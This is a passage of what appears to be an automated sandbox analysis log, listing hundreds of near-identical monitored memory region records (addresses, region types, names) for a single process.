0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13274 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13275 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13276 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13277 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13278 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13279 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13280 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13281 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13282 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13283 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13284 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13285 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13286 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13287 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13288 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13289 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13290 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13291 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13292 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13293 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13294 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13295 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13296 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13297 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13298 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13299 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13300 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13301 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13302 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13303 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13304 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 13305 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13306 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13307 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13308 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13309 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13310 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13311 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13312 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13313 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 13314 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13315 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13316 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13317 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 13318 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13319 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13320 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13321 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13322 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13323 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13324 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13325 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13326 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13327 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13328 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13329 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13330 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13331 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13332 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13333 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13334 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13335 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13336 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13337 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13338 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13339 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 13340 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13341 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13342 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13343 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13344 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13345 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13346 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13347 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13348 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13349 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13350 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13351 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13352 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13353 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13354 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13355 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13356 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13357 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13358 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13359 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13360 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13361 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13362 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13363 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13364 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13365 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13366 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13367 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13368 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13369 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13370 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13371 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13372 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13373 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13374 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13375 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13376 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13377 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13378 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13379 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13380 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13381 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13382 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13383 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13384 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13385 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 13386 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13387 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13388 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13389 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13390 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13391 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13392 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13393 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13394 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13395 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13396 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13397 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13398 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13399 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13400 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13401 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13402 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13403 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13404 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13405 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13406 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13407 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13408 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13409 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13410 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13411 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13412 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13413 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13414 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13415 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13416 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13417 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13418 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13419 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13420 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13421 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13422 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13423 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13424 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13425 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13426 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13427 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13428 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13429 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13430 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 13431 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13432 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13433 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13434 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13435 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 13436 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 13437 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13438 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13439 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13440 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13441 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13442 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13443 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13444 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13445 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13446 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13447 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 13448 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13449 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13450 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13451 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13452 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13453 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13454 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13455 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13456 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13457 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13458 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13459 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13460 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 13461 start_va = 